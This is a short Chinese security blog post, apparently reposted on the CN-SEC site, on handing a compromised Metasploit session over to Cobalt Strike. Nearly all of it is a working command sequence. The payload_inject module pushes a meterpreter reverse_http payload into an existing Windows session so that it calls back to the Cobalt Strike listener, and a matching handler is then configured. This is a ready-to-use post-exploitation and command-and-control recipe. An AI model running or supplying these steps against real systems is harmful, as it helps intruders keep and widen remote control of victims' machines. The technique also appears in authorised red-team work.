MSF 派生 Cobalt Strike 会话

admin 2023年12月15日22:37:13评论20 views字数 509阅读1分41秒阅读模式

利用 Metasploit 派生 Cobalt Strike 会话

信息.

metasploit IP:192.168.1.100 PORT:4444
Cobalt Strike IP:192.168.1.101 PORT:5555

利用 payload_inject 模块注入新的 payload.

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set session 1
set disablepayloadhandler true
run

在监听时将 LHOSTLPORT 改成 Cobalt Strike 对应的 IP 和 PORT.

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.1.101
set lport 5555
set disablepayloadhandler true 
run

- By:X1r0z[exp10it.cn]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月15日22:37:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MSF 派生 Cobalt Strike 会话http://cn-sec.com/archives/2304684.html

发表评论

匿名网友 填写信息